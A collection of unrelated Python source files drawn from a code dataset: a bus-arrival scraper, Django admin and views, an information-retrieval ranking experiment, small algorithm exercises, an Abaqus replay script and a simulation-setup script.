nb_url = 'https://buseta.wmata.com/m/index?q=2001159' #test url, twinbrook station bus stop
#sb_url = 'https://buseta.wmata.com/m/index?q=3002518' #url for laurel-bowie & montpelier south-bound route 87 bus stop
#nb_url = 'https://buseta.wmata.com/m/index?q=3002573' #url for greenbelt metro north-bound route 87 bus stop
distances = ['approaching', 'at stop'] #bus distance statuses to capture, i.e., don't log "2.3 miles" statuses
max_time = 3 #time in minutes away from stop under which to start logging presence
route_names = ['E4 WEST to FRIENDSHIP HEIGHTS', 'C4 EAST to PRINCE GEORGES PLAZA STATION'] #test routes to capture on bus stop pages
#route_names = ['Route 87 - SOUTH to GREENBELT STATION', 'Route 87 - NORTH to LAUREL']
####################
temp = []
results = []
# Fetch both stop pages and timestamp this scrape.
nb_pagedata = requests.get(nb_url)
sb_pagedata = requests.get(sb_url)
current_date = time.strftime('%x')
current_time = time.strftime('%X')
nb_cleanpagedata = bs4.BeautifulSoup(nb_pagedata.text, 'html.parser')
sb_cleanpagedata = bs4.BeautifulSoup(sb_pagedata.text, 'html.parser')
nb_arrivals = nb_cleanpagedata.find_all(class_='arrivalsAtStop')
sb_arrivals = sb_cleanpagedata.find_all(class_='arrivalsAtStop')
# Each temp entry: [route name, eta, distance status, ...] with nbsp cleaned up.
for arrival in nb_arrivals:
    temp.append([list(arrival.parent.strings)[0].strip(', ').replace('\xa0', ' ')] + [x.strip(', ').replace('\xa0', ' ') for x in arrival.strings])
for arrival in sb_arrivals:
    temp.append([list(arrival.parent.strings)[0].strip(', ').replace('\xa0', ' ')] + [x.strip(', ').replace('\xa0', ' ') for x in arrival.strings])
# Keep arrivals that are close (by minutes or status) on a watched route.
# NOTE(review): float(...) on arrival[1] is evaluated before the 'or', so a
# non-numeric first field would raise ValueError — confirm the page format.
for arrival in temp:
    if (float(arrival[1].split(' ')[0]) < max_time or arrival[2] in distances) and arrival[0] in route_names:
        results.append([current_date, current_time, arrival[0], arrival[1], arrival[2], arrival[3]])
if f_writeout:
    if results:
        with open(r'bus_log.csv', 'a') as f:
            logger = csv.writer(f)
            logger.writerows(results)
        # NOTE(review): f.close() after a 'with' block is redundant (already closed).
        f.close()
else:
    print(results)
|
12,489 | d87f02630744a787d0a0b53ba58359a57564db80 | from django.contrib import admin
from .models import School, Grade, Student, Mentor, Student_Group_Mentor_Assignment, Session_Schedule, Attendance, User, remark
# Register your models here.
class UserList(admin.ModelAdmin):
    """Admin changelist configuration for the custom User model."""
    list_display = ('email','username','is_active','created_on','role','is_staff','is_mentor')
    list_filter = ('email','username','is_active','created_on','role','is_staff','is_mentor')
    search_fields = ('email','username','is_active','created_on','role','is_staff','is_mentor')
    ordering = ['email']
class SchoolList(admin.ModelAdmin):
    """Admin changelist configuration for School records."""
    list_display = ('school_name', 'school_email', 'school_phone')
    list_filter = ('school_name', 'school_email')
    search_fields = ('school_name',)
    ordering = ['school_name']
class GradeList(admin.ModelAdmin):
    """Admin changelist configuration for Grade records."""
    list_display = ['grade_num']
    list_filter = ['grade_num']
    search_fields = ['grade_num']
    ordering = ['grade_num']
class StudentList(admin.ModelAdmin):
    """Admin changelist configuration for Student records."""
    list_display = ('student_first_name', 'student_middle_name', 'student_last_name', 'school', 'grade')
    list_filter = ('student_first_name', 'student_last_name', 'school', 'grade')
    search_fields = ('student_first_name', 'student_last_name', 'school', 'grade')
    ordering = ['student_first_name']
class MentorList(admin.ModelAdmin):
    """Admin changelist configuration for Mentor records."""
    list_display = ('mentor_first_name', 'mentor_middle_name', 'mentor_last_name', 'mentor_email', 'mentor_phone')
    list_filter = ('mentor_first_name', 'mentor_middle_name', 'mentor_last_name', 'mentor_email', 'mentor_phone')
    search_fields = ('mentor_first_name', 'mentor_middle_name', 'mentor_last_name', 'mentor_email', 'mentor_phone')
    ordering = ['mentor_first_name']
class GroupMentorAssignmentList(admin.ModelAdmin):
    """Admin changelist configuration for student-group/mentor assignments."""
    list_display = ('group_name', 'school', 'grade', 'mentor')
    list_filter = ('group_name', 'school', 'grade', 'mentor')
    search_fields = ('group_name', 'school', 'grade', 'mentor')
    ordering = ['group_name']
class SessionScheduleList(admin.ModelAdmin):
    """Admin changelist configuration for scheduled mentoring sessions."""
    list_display = ('session_name', 'session_location', 'mentor', 'group', 'session_start_date', 'session_end_date')
    list_filter = ('session_name', 'session_location', 'mentor', 'group', 'session_start_date', 'session_end_date')
    search_fields = ('session_name', 'session_location', 'mentor', 'group', 'session_start_date', 'session_end_date')
    ordering = ['session_name']
class remarkList(admin.ModelAdmin):
    """Admin changelist configuration for mentor remarks about students."""
    list_display = ('remark_notes','remark_student_id', 'remark_mentor_id')
class AttendanceList(admin.ModelAdmin):
    """Admin changelist configuration for per-session attendance records."""
    list_display = (
        'attendance_student_id', 'attendance_grade_id', 'attendance_mentor_id', 'attendance_session_ID',
        'attendance_ID')
    list_filter = (
        'attendance_student_id', 'attendance_grade_id', 'attendance_mentor_id', 'attendance_session_ID',
        'attendance_ID')
    search_fields = (
        'attendance_student_id', 'attendance_grade_id', 'attendance_mentor_id', 'attendance_session_ID',
        'attendance_ID')
    ordering = ['attendance_session_ID']
# Attach each model to the admin site with its customized ModelAdmin.
admin.site.register(User,UserList)
admin.site.register(School, SchoolList)
admin.site.register(Grade, GradeList)
admin.site.register(Student, StudentList)
admin.site.register(Mentor, MentorList)
admin.site.register(Student_Group_Mentor_Assignment, GroupMentorAssignmentList)
admin.site.register(Session_Schedule, SessionScheduleList)
admin.site.register(Attendance, AttendanceList)
admin.site.register(remark,remarkList)
|
12,490 | 67e9c7f95207bf57e992731381853218815a07b4 | import numpy as np
import pandas as pd
import pyterrier as pt
import xgboost as xgb
import time
# Start the PyTerrier JVM once, with a 20 GB heap for the large index.
if not pt.started():
    pt.init(mem=20000)
# TREC 2019 Deep Learning track (documents) benchmark.
dataset = pt.get_dataset("trec-deep-learning-docs")
def msmarco_generate():
    """Stream MSMARCO documents from the gzipped TSV as dicts for indexing."""
    with pt.io.autoopen('msmarco-docs.tsv.gz', 'rt') as corpusfile:
        for line in corpusfile:
            # Each line is exactly: docid<TAB>url<TAB>title<TAB>body
            docno, url, title, body = line.split("\t")
            yield {'docno': docno, 'url': url, 'title': title, 'text': body}
# Index with term positions (blocks=True) and no term pipeline (no stemming/stopwords).
props = {
    'indexer.meta.reverse.keys':'docno',
    'termpipelines' : '',
}
indexer = pt.IterDictIndexer("./document_index", blocks=True, verbose=True)
indexer.setProperties(**props)
indexref = indexer.index(msmarco_generate(), fields=['docno', 'text'], meta=['docno', 'text'], meta_lengths=[20, 4096])
index = pt.IndexFactory.of(indexref)
print(index.getCollectionStatistics().toString())
# Candidate generation with DirichletLM plus per-document LTR features.
# NOTE(review): the trailing '% 100' is PyTerrier's rank-cutoff operator,
# keeping the top 100 candidates per query — confirm that is intended.
fbr = pt.FeaturesBatchRetrieve(index,
                               properties={"termpipelines": ""},
                               controls = {"wmodel": "DirichletLM"},
                               verbose=True,
                               features=["WMODEL:Tf", "WMODEL:PL2", "WMODEL:BM25", "WMODEL:DPH", "WMODEL:TF_IDF", "SAMPLE"]) % 100
# LambdaMART (XGBoost ranker) hyper-parameters.
params = {'objective': 'rank:ndcg',
          'learning_rate': 0.1,
          'gamma': 1.0, 'min_child_weight': 0.1,
          'max_depth': 6,
          'verbose': 2,
          'random_state': 42
          }
# Retrieval >> learned re-ranker pipeline.
BaseLTR_LM = fbr >> pt.pipelines.XGBoostLTR_pipeline(xgb.sklearn.XGBRanker(**params))
train_start_time = time.time()
BaseLTR_LM.fit(pt.io.read_topics("sample_train_20000.txt", format="singleline"), dataset.get_qrels("train"), dataset.get_topics("dev"), dataset.get_qrels("dev"))
train_end_time = time.time()
print("Train time:", train_end_time-train_start_time)
test_start_time = time.time()
# Evaluate on the held-out test topics with MRR, nDCG@10 and MAP.
allresultsLM = pt.pipelines.Experiment([BaseLTR_LM],
                                dataset.get_topics("test"),
                                dataset.get_qrels("test"), ["recip_rank", "ndcg_cut_10","map"],
                                names=["LambdaMART"])
test_end_time = time.time()
print("Test time:", test_end_time-test_start_time)
print(allresultsLM)
# Reference:
# [1] Craig Macdonald and Nicola Tonellotto. 2020. Declarative Experimentation inInformation Retrieval using PyTerrier. InProceedings of ICTIR 2020.
|
12,491 | 5c157bbff4bc4049751d537704482489b440b6c9 | from numpy import *
from os import listdir
import operator
# Convert a 32x32 binary text image into a 1x1024 row vector.
def imgVector(filename):
    """Flatten a 32x32 text image of '0'/'1' characters into a 1x1024 vector.

    Each of the first 32 lines of the file must contain at least 32 digit
    characters. Fix: the original leaked the file handle; 'with' closes it.
    """
    returnVect = zeros((1, 1024))
    with open(filename) as f:
        for i in range(32):
            listStr = f.readline()
            for j in range(32):
                returnVect[0, 32*i+j] = int(listStr[j])
    return returnVect
def classify(inX, dataSet, labels, k):
    """k-NN vote: return the majority label among the k nearest rows of dataSet."""
    n_samples = dataSet.shape[0]
    # Euclidean distance from inX to every training row (broadcast via tile).
    deltas = tile(inX, (n_samples, 1)) - dataSet
    dists = ((deltas ** 2).sum(axis=1)) ** 0.5
    nearest_first = dists.argsort()
    # Tally the labels of the k closest samples.
    votes = {}
    for rank in range(k):
        label = labels[nearest_first[rank]]
        votes[label] = votes.get(label, 0) + 1
    ranked = sorted(votes.items(), key=operator.itemgetter(1), reverse=True)
    return ranked[0][0]
def handwritingClassTest():
    """Train on trainingDigits/ and report the k-NN error rate on testDigits/.

    File names look like "<digit>_<sample>.txt"; the digit before '_' is the
    label. Fix: use '/' path separators (valid on both Windows and POSIX);
    the original backslash paths only worked on Windows.
    """
    hwlabels = []
    # Build the training matrix and its parallel label list.
    trainingFileList = listdir('trainingDigits')
    m = len(trainingFileList)
    trainingMat = zeros((m,1024))
    for i in range(m):
        fileNameStr = trainingFileList[i]
        fileStr = fileNameStr.split('.')[0]
        labelNum = int(fileStr.split('_')[0])
        hwlabels.append(labelNum)
        trainingMat[i, :] = imgVector('trainingDigits/%s' % fileNameStr)
    # Classify every test image with k=3 and count mistakes.
    testFileList = listdir('testDigits')
    errorCount = 0.0
    mTest = len(testFileList)
    for j in range(mTest):
        fileNameStr = testFileList[j]
        fileStr = fileNameStr.split('.')[0]
        labelNum = int(fileStr.split('_')[0])
        testVector = imgVector('testDigits/%s' % fileNameStr)
        classifiyResult = classify(testVector, trainingMat, hwlabels, 3)
        if int(classifiyResult) != labelNum:
            errorCount += 1.0
    print('一共错了:%f个'%errorCount)
    rightRatio = 1 - (errorCount/float(mTest))
    print('正确率为:%f %%'%(rightRatio*100))
# Run the evaluation when the module is executed/imported.
handwritingClassTest()
|
12,492 | 82aefcd8bcf5fd8d7ba82ab6afd267c405b14cbc | import copy
import random
from presenter import SortPresenter
# Length of the demo list to sort.
SIZE = 10
# Seconds the presenter pauses between animation frames.
PAUSE_SEC = 0.3
# Master switch for the visual presenter.
IS_DISPLAY = True
def _swap(lst, i, t):
v = lst[i]
lst[i] = lst[t]
lst[t] = v
return lst
def comb_sort(l, is_display=True):
    """Comb sort `l` in place (shrink factor 1.3), optionally animating each step.

    Generalized: the gap is derived from len(l) instead of the hard-coded
    module constant SIZE, so lists of any length sort correctly (the initial
    gap is clamped to >= 1 so 0/1-element lists terminate). Prints the number
    of comparisons performed, matching the original behavior.
    """
    n = len(l)
    interval = max(int(n // 1.3), 1)
    counter = 0
    is_swapped = True
    if is_display:
        presenter = SortPresenter(n)
    # Done when the gap has shrunk to 1 and a full pass made no swaps.
    while not (interval == 1 and not is_swapped):
        is_swapped = False
        for i in range(n - interval):
            counter += 1
            target = i + interval
            if is_display:
                before = copy.deepcopy(l)
            if l[i] > l[target]:
                # In-place tuple swap of the out-of-order pair.
                l[i], l[target] = l[target], l[i]
                is_swapped = True
            if is_display:
                presenter.show_compare_and_swap(
                    index=i,
                    target=target,
                    before_list=before,
                    after_list=l,
                    pause_sec=PAUSE_SEC,
                )
        if interval > 1:
            interval = int(interval // 1.3)
    print(counter)
if __name__ == '__main__':
    # Build a shuffled 1..SIZE list and sort it (optionally animated).
    lst = [e + 1 for e in range(SIZE)]
    random.shuffle(lst)
    comb_sort(lst, is_display=IS_DISPLAY)
|
12,493 | c816ab40acf2fd355fac3f90ec573e5942b3a1da | from django.core.mail import EmailMultiAlternatives, BadHeaderError
from django.conf import settings
from django.db import transaction
from django.http import HttpResponse
from django.shortcuts import redirect
from django.template import loader
from django.utils.html import strip_tags
from django.views.generic import TemplateView
from django_classified.views import ItemDetailView
from django_classified.models import Item
from yardsale.forms import ContactForm
from yardsale.models import Reservation
class ItemDetailView(ItemDetailView):
    """Item detail page extended with a purchase-contact form and reservation flow.

    Intentionally subclasses (and shadows) the imported django_classified
    ItemDetailView under the same name.
    """
    model = Item
    queryset = Item.active
    def get_context_data(self, **kwargs):
        # Pre-fill the contact form with a "want to buy" message for this item.
        form = ContactForm()
        instance = self.get_object()
        context = super().get_context_data(**kwargs)
        message = 'Hello, i would like to buy an item: {}, id: {}'.format(
            instance.title,
            instance.id,
        )
        form.fields['message'].initial = message
        context['form'] = form
        return context
    def post(self, request, *args, **kwargs):
        # Handle a buyer's reservation request for this item.
        form = ContactForm(request.POST)
        instance = self.get_object()
        if form.is_valid():
            from_email = form.cleaned_data['from_email']
            subject = form.cleaned_data['subject']
            to_email = instance.user.email
            # Atomically create the reservation and deactivate the listing.
            with transaction.atomic():
                Reservation.objects.create(
                    email=from_email,
                    item=instance,
                    state='NEW'
                )
                instance.is_active = False
                instance.save()
            html_content = loader.render_to_string(
                'emails/reservation.html',
                {
                    'request': request,
                    'item': instance,
                    'message': form.cleaned_data['message']
                },
                request
            )
            # Email the buyer, cc the seller and staff addresses.
            try:
                mail = EmailMultiAlternatives(
                    subject=subject,
                    body=strip_tags(html_content),
                    from_email=settings.EMAIL_FROM,
                    to=[
                        from_email
                    ],
                    cc=[
                        to_email,
                        settings.ADMIN_EMAIL,
                        settings.ACCOUNTANT_EMAIL
                    ],
                    reply_to=[from_email],
                )
                mail.attach_alternative(html_content, 'text/html')
                mail.send()
            except BadHeaderError:
                return HttpResponse('Invalid header found.')
            return redirect('reserved')
        # NOTE(review): an invalid form falls through and returns None, which
        # Django rejects — confirm whether re-rendering the page was intended.
class ReservationOutcomeView(TemplateView):
    """Static confirmation page shown after a reservation is made
    (target of the 'reserved' redirect in ItemDetailView.post)."""
    template_name = 'reservation_outcome.html'
|
import sys

import pandas as pd

# Stack Overflow developer-survey dump; a different file may be given as argv[1].
DEFAULT_FILENAME = "survey_results_public.csv"
COUNTRY_NAME = 'Israel'

# Every DevType category of interest; the survey stores several per row in one
# delimited string, so membership is tested by substring.
DEV_TYPES = [
    'Academic researcher', 'Data or business analyst',
    'Data scientist or machine learning specialist', 'Database administrator',
    'Designer', 'Developer, back-end',
    'Developer, desktop or enterprise applications',
    'Developer, embedded applications or devices', 'Developer, front-end',
    'Developer, full-stack', 'Developer, game or graphics',
    'Developer, mobile', 'Developer, QA or test',
    'DevOps specialist', 'Educator', 'Engineer, data',
    'Engineer, site reliability', 'Engineering manager',
    'Marketing or sales professional', 'Product manager', 'Scientist',
    'Senior Executive (C-Suite, VP, etc.)', 'System administrator',
]


def load_country_rows(filename, country_name):
    """Read only the Country/DevType columns in chunks and keep the rows
    belonging to `country_name`.  Chunked reading keeps memory bounded on the
    full survey file."""
    parts = [
        chunk[chunk['Country'] == country_name]
        for chunk in pd.read_csv(filename,
                                 usecols=['Country', 'DevType'],
                                 chunksize=10000)
    ]
    return pd.concat(parts)


def add_devtype_flags(df, dev_types):
    """Add one boolean column per dev type: True when the row's DevType string
    mentions that type.  Returns the mutated frame.

    Uses the vectorized `str.contains` (substring, no regex) instead of the
    original row-wise `df.apply`; `na=False` makes missing DevType count as
    False, matching the original `pd.notnull(...) and ...` check.
    """
    for value in dev_types:
        print(value)
        df[value] = df['DevType'].str.contains(value, regex=False, na=False)
    return df


def main(argv):
    """Load the survey rows for COUNTRY_NAME, flag dev types, print summaries."""
    filename = argv[1] if len(argv) == 2 else DEFAULT_FILENAME
    df = load_country_rows(filename, COUNTRY_NAME)
    print(df.dtypes)
    df = add_devtype_flags(df, DEV_TYPES)
    print(df.count())
    print(df.size)
    print(df)


if __name__ == '__main__':
    main(sys.argv)
|
12,495 | be2e25175a6324997c6fa62e9906dccd5fb6674d | # -*- coding: mbcs -*-
#
# Abaqus/CAE Release 2017 replay file
# Internal Version: 2016_09_28-05.54.59 126836
# Run by WangDoo on Sun Aug 18 15:49:14 2019
#
# from driverUtils import executeOnCaeGraphicsStartup
# executeOnCaeGraphicsStartup()
#: Executing "onCaeGraphicsStartup()" in the site directory ...
from abaqus import *
from abaqusConstants import *
# Auto-generated Abaqus/CAE replay: recreate the viewport exactly as it was
# sized in the recorded interactive session, then make it current.
session.Viewport(name='Viewport: 1', origin=(0.0, 0.0), width=238.520309448242,
    height=73.5212936401367)
session.viewports['Viewport: 1'].makeCurrent()
session.viewports['Viewport: 1'].maximize()
from caeModules import *
from driverUtils import executeOnCaeStartup
executeOnCaeStartup()
# Open the model database captured during the session (original absolute path
# is noted in the generated message comment below).
openMdb('test-write.cae')
#: The model database "D:\Coding\Github\Fortarn\Abaqus\USDFLD\cae\test-write.cae" has been opened.
session.viewports['Viewport: 1'].setValues(displayedObject=None)
# Display Part-1 with its reference representation enabled.
session.viewports['Viewport: 1'].partDisplay.geometryOptions.setValues(
    referenceRepresentation=ON)
p = mdb.models['Model-1'].parts['Part-1']
session.viewports['Viewport: 1'].setValues(displayedObject=p)
# Switch to the root assembly and turn on load/BC/predefined-field/connector
# display while hiding optimization/restriction/stop-condition symbols.
a = mdb.models['Model-1'].rootAssembly
session.viewports['Viewport: 1'].setValues(displayedObject=a)
session.viewports['Viewport: 1'].assemblyDisplay.setValues(loads=ON, bcs=ON,
    predefinedFields=ON, connectors=ON, optimizationTasks=OFF,
    geometricRestrictions=OFF, stopConditions=OFF)
|
12,496 | 6ace18bec836752e71475c542e0d95f728fe5e1d | from peewee import DoesNotExist
from playhouse.shortcuts import model_to_dict
from main.models.person import Person
from ron.web import Controller
from ron import request, response
class API(Controller):
    """REST-style JSON API for Person resources, mounted under /api."""

    # sets a base route for this controller
    base_route = '/api'

    @Controller.route('/', method='GET')
    def index(self):
        """
        Just returns the "index" text on the base api url
        """
        return dict(data='index')

    @Controller.route('/person', method='GET')
    def get_persons(self):
        """
        Get all Persons
        """
        result = Person.select().dicts()
        return dict(name='Person', data=list(result))

    @Controller.route('/person', method='POST')
    def add_person(self):
        """
        Insert a new Person; on validation failure the errors are returned
        instead of the saved record.
        """
        data = dict(request.forms)
        pp = Person(**data)
        if pp.validate():
            pp.save()
            data = model_to_dict(pp)
        else:
            data = pp.validator().errors
        return dict(name='Person', data=data)

    @Controller.route('/person/<id:int>', method='GET')
    def get_person(self, id):
        """
        Return a person by id, or a 404 payload when it does not exist.
        """
        try:
            person = Person.get(Person.id == id)
            data = model_to_dict(person)
        except DoesNotExist:
            response.status = 404
            data = "Not found"
        return dict(name='Person', data=data)

    @Controller.route('/person/<id:int>', method='PUT')
    def update_person(self, id):
        """
        Update a Person.

        BUGFIX: mirrors get_person's 404 handling — the original let
        DoesNotExist escape as an unhandled 500 for unknown ids.
        """
        try:
            person = Person.get(Person.id == id)
        except DoesNotExist:
            response.status = 404
            return dict(name='Person', data="Not found")
        form_data = dict(request.forms)
        if person.validate(form_data):
            person.update_model(form_data)
            person.save()
            data = model_to_dict(person)
        else:
            data = person.validator().errors
        return dict(name='Person', data=data)

    @Controller.route('/person/<id:int>', method='DELETE')
    def delete_person(self, id):
        """
        Delete a person; returns the number of rows removed.
        """
        data = Person.delete().where(Person.id == id).execute()
        return dict(name='Person', data=data)
|
12,497 | 9f8ad9c4bdb0e7739014c42223ce4e629b4ed2be | #!/usr/bin/env python
import argparse
import glob
import os
import shutil
import subprocess as sp
import sys

import numpy as np
import ROOT

import parametersweep as ps
import utilities as ut
import visualize
# Run ROOT in batch mode so no graphics windows are opened.
ROOT.gROOT.SetBatch(ROOT.kTRUE)
'''Performs the analysis of conductance-based model. Unlike the lifanalysis.py and qifanalysis.py script, it assumes that the matrix files for these experiments already
have been generated. It is assumed that all model and matrix files have been provided with this script and that they reside in this director.
Run the check_setup_routine to find out if this is the case.'''
# Model nickname -> .model file, and model file -> its transition-matrix files
# (one matrix per jump size, in the same order as J below).
MODELS={}
MATRICES={}
MODELS['standard']='condee2a5ff4-0087-4d69-bae3-c0a223d03693.model'
MATRICES[MODELS['standard']]=['condee2a5ff4-0087-4d69-bae3-c0a223d03693_0_0.05_0_0_.mat', 'condee2a5ff4-0087-4d69-bae3-c0a223d03693_0_0.1_0_0_.mat']
MODELS['clipped']='cond7bc12c35-9d87-43fc-8ccc-9223c2714440.model'
MATRICES[MODELS['clipped']]=['cond7bc12c35-9d87-43fc-8ccc-9223c2714440_0_0.05_0_0_.mat','cond7bc12c35-9d87-43fc-8ccc-9223c2714440_0_0.1_0_0_.mat']
J= [0.05,0.1] # jump size.
DIR_GAIN_STANDARD = 'gain_standard' # directory where the gain results should be produced
DIR_GAIN_CLIPPED = 'gain_clipped'
def check_setup_routine():
    """Verify that every model file and all of its matrix files are present
    in the working directory; raise on the first missing file."""
    for model_file in MODELS.values():
        if not os.path.exists(model_file):
            raise NameError('Model file missing: ' + model_file)
        missing = [m for m in MATRICES[model_file] if not os.path.exists(m)]
        if missing:
            raise NameError('Matrix file missing: ' + missing[0])
    print('All files present')
def generate_gain_xml_files(xml_file, rates, J, model, matrices, dir):
    """Write one simulation XML per (jump size, input rate) combination.

    Starts from the template `xml_file` and, for each jump size j in J and
    each rate in `rates`, rewrites the relevant tags and saves the result as
    <dir>/<dir>_<j>_<rate>.xml.

    Parameters
    ----------
    xml_file : template XML file name (e.g. 'cond.xml')
    rates    : input rates substituted into the <expression> tag
    J        : jump sizes; only 0.05 and 0.1 select a matrix file here
    model    : model file written into every MeshAlgorithm element
    matrices : [matrix_for_j_0.05, matrix_for_j_0.1]
    dir      : output directory, also used as the file-name prefix
    """
    for j in J:
        for rate in rates:
            f=ps.xml_file (xml_file)
            abs_path = os.path.join(dir, dir + '_' + str(j) + '_' + str(rate) + '.xml')
            # Extend the simulated time from the template's 0.3 to 2.0.
            tag_st = ps.xml_tag('<t_end>0.3</t_end>')
            f.replace_xml_tag(tag_st,2.0)
            # Replace the template's fixed input rate (1000) with `rate`.
            tag_exp =ps.xml_tag('<expression>1000</expression>')
            f.replace_xml_tag(tag_exp,rate)
            # Select the transition matrix matching the jump size; other jump
            # sizes leave the template's matrix file untouched.
            tag_mf = ps.xml_tag('<MatrixFile>condee2a5ff4-0087-4d69-bae3-c0a223d03693_0_0.05_0_0_.mat</MatrixFile>')
            if j == 0.05:
                f.replace_xml_tag(tag_mf,matrices[0])
            if j == 0.1:
                f.replace_xml_tag(tag_mf,matrices[1])
            # Rewrite the jump size inside the input connection; the extra
            # argument presumably selects which field of the tag to replace
            # (ps.xml_file API) -- TODO confirm.
            tag_con= ps.xml_tag('<Connection In="Inp" Out="AdExp E">1 0.05 0</Connection>')
            f.replace_xml_tag(tag_con,j,1)
            # Point every MeshAlgorithm element at the requested model file.
            algs = f.tree.getroot().find('Algorithms')
            for a in algs:
                if a.attrib['type'] == 'MeshAlgorithm':
                    a.attrib['modelfile'] = model
            f.write(abs_path)
def generate_gain(rerun=True, batch=False):
    """Prepare the gain-experiment directories and XML files, and optionally
    submit the jobs.

    Creates the standard/clipped output directories, copies the model and
    matrix files into them (they must be present there for the simulator),
    generates one XML per (jump size, rate) combination, and when `rerun` is
    True submits the jobs via utilities.instantiate_jobs (`batch` selects
    batch submission).

    Uses os.makedirs/shutil.copy instead of the original subprocess
    'mkdir'/'cp' calls: portable, no shell-tool dependency, and errors raise
    instead of being silently ignored.
    """
    os.makedirs(DIR_GAIN_STANDARD, exist_ok=True)
    os.makedirs(DIR_GAIN_CLIPPED, exist_ok=True)
    # the matrix and model files must be present in the gain directories.
    shutil.copy(MODELS['standard'], DIR_GAIN_STANDARD)
    for name in MATRICES[MODELS['standard']]:
        shutil.copy(name, DIR_GAIN_STANDARD)
    shutil.copy(MODELS['clipped'], DIR_GAIN_CLIPPED)
    for name in MATRICES[MODELS['clipped']]:
        shutil.copy(name, DIR_GAIN_CLIPPED)
    input_rates = np.arange(0., 3500, 100.)
    generate_gain_xml_files('cond.xml', input_rates, [0.05, 0.1],
                            MODELS['standard'], MATRICES[MODELS['standard']],
                            DIR_GAIN_STANDARD)
    generate_gain_xml_files('cond.xml', input_rates, [0.05, 0.1],
                            MODELS['clipped'], MATRICES[MODELS['clipped']],
                            DIR_GAIN_CLIPPED)
    if rerun:
        ut.instantiate_jobs(DIR_GAIN_STANDARD, batch)
        ut.instantiate_jobs(DIR_GAIN_CLIPPED, batch)
def demofy():
    '''This functions massages batch submission scripts so that they have appropriate settings for parameters. If
    none are present it is assumed that this is not needed.'''
    if not os.path.exists('sub.sh'):
        return
    with open('sub.sh') as f:
        lines = f.readlines()
    # Replace the final line with a larger memory request and append the
    # demo command to run.
    lines[-1] = '#$ -l h_vmem=16000M\n'
    # NOTE(review): MODELS defines only 'standard' and 'clipped'; 'oslo'
    # raises KeyError as soon as sub.sh exists -- confirm the intended key.
    lines.append('demo2D.py ' + MODELS['oslo'] + ' y b')
    # Rewrite every '4:' as '12:' -- presumably bumping a 4h time request to
    # 12h in the scheduler directives; verify against the sub.sh template.
    replines = [ w.replace('4:','12:') for w in lines ]
    with open('demo.sh','w') as g:
        for line in replines:
            g.write(line)
    # Make the generated script executable.
    sp.call(['chmod', '+x', 'demo.sh'])
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    # --b: submit as batch jobs; --d: produce DSTs instead of generating
    # simulation files.
    parser.add_argument('--b', action='store_true')
    parser.add_argument('--d', action='store_true')
    args = parser.parse_args()
    demofy()
    if args.d == False:
        print('Generating simulation files')
        generate_gain(rerun=True,batch=args.b)
    if args.d == True:
        if args.b == True:
            print('Batch option ignored in DST production.')
        else:
            # NOTE(review): DIR_GAIN and DIR_SPECTRUM are never defined in
            # this file (only DIR_GAIN_STANDARD/DIR_GAIN_CLIPPED are), so
            # this branch raises NameError as written -- confirm the intended
            # directory constants before relying on DST production.
            dst_name = 'DST_' + DIR_GAIN
            sp.call(['mkdir',dst_name])
            dst_path = os.path.join(sys.path[0], dst_name)
            dir_list = sp.check_output(['ls','spectrum/spectrum']).split()
            for d in dir_list:
                om = d.split('_')[1]
                ratefile = 'single'
#                sp.call(['cp',os.path.join(DIR_SPECTRUM,DIR_SPECTRUM,d,ratefile),os.path.join(dst_name,'rate_file' + '_' + om)])
            # that out of the way, submit visualization as batch job
            for d in dir_list:
                dir_path = os.path.join(DIR_SPECTRUM, DIR_SPECTRUM, d)
                sp.call(['cp','demo.sh',dir_path])
                with ut.cd(dir_path):
                    sp.call(['qsub','demo.sh'])
|
12,498 | 8aa77fa63c1d0e6b8f24fe57c4ce18bc8e3f8c16 | from util.get_tklogintoken import Teamkitlogintoken
from util.get_logincode import qrcode
from log.user_log import UserLog
class envlogin(object):
    """Log into the Teamkit test environment.

    On construction, fetches a login token/header via the mplogin API; the
    tologin() method then performs the QR-code login with that header.
    """

    def __init__(self, driver):
        log = UserLog()
        self.logger = log.get_log()
        self.driver = driver
        teamkit_login = Teamkitlogintoken()
        teamkit_login.url = "https://dnapp.bitkinetic.com/api/v5/login/mplogin"
        # SECURITY: test credentials are hardcoded in source; move them to
        # configuration/environment variables before sharing this file.
        teamkit_login.body = {
            "zoneNum": "86",
            "phone": "15088132074",
            "password": "123456"
        }
        # Result presumably is (token, header) -- tologin() uses index 1.
        self.tks = teamkit_login.getMerloginHeader()
        # Replaces the leftover debug output ("11111111111" and a bare print)
        # with one meaningful log line.
        self.logger.info("mplogin returned token header: %s", self.tks)

    def tologin(self):
        """Perform the QR-code login using the header from the token call."""
        header = self.tks[1]
        qrcodelogin = qrcode(self.driver)
        qrcodeloginurl = "https://dnapp.bitkinetic.com/api/v5/user/qrcodelogin"
        qrcodelogin.toqrcodelogin(qrcodeloginurl, header)
        self.logger.info("qrcode login request sent")
|
'''
Based on the snack-bar price table, read an item code and a quantity and
print the amount to pay.

Input: two integers -- the item code and the quantity.
Output: the message "Total: R$ " followed by the amount, with 2 decimal
places.
'''

# Item code -> unit price, replacing the original chain of independent `if`
# statements (which left `preco` unbound for an unknown code).
PRECOS = {
    1: 4.0,
    2: 4.5,
    3: 5.0,
    4: 2.0,
    5: 1.5,
}


def total_a_pagar(codigo, qtd):
    """Return the bill total for `qtd` units of the item with code `codigo`.

    Raises KeyError for a code outside the price table (the original raised
    NameError via an unbound variable).
    """
    return qtd * PRECOS[codigo]


def main():
    """Read 'codigo qtd' from stdin and print the formatted total."""
    codigo, qtd = (int(v) for v in input().split(' '))
    print('Total: R$ %.2f' % total_a_pagar(codigo, qtd))


if __name__ == '__main__':
    main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.